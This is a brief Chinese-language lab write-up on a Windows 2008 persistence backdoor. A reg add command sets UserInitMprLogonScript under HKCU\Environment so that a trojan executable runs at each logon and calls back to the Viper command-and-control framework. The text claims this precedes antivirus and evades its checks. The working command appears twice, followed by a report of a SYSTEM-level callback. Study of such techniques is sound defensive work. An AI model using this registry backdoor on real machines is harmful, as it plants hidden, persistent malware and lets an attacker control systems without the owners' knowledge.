实验设备:Win2008
实验要求:在2008用户登陆时,修改注册表,触发logon,执行木马,上线Viper
Logon script后门
Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截
1.在Win2008上cmd输入reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704423740.exe" ,添加注册表,开机即执行木马
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704423740.exe"
2.注销,再次上线
3.Viper成功上线,权限为system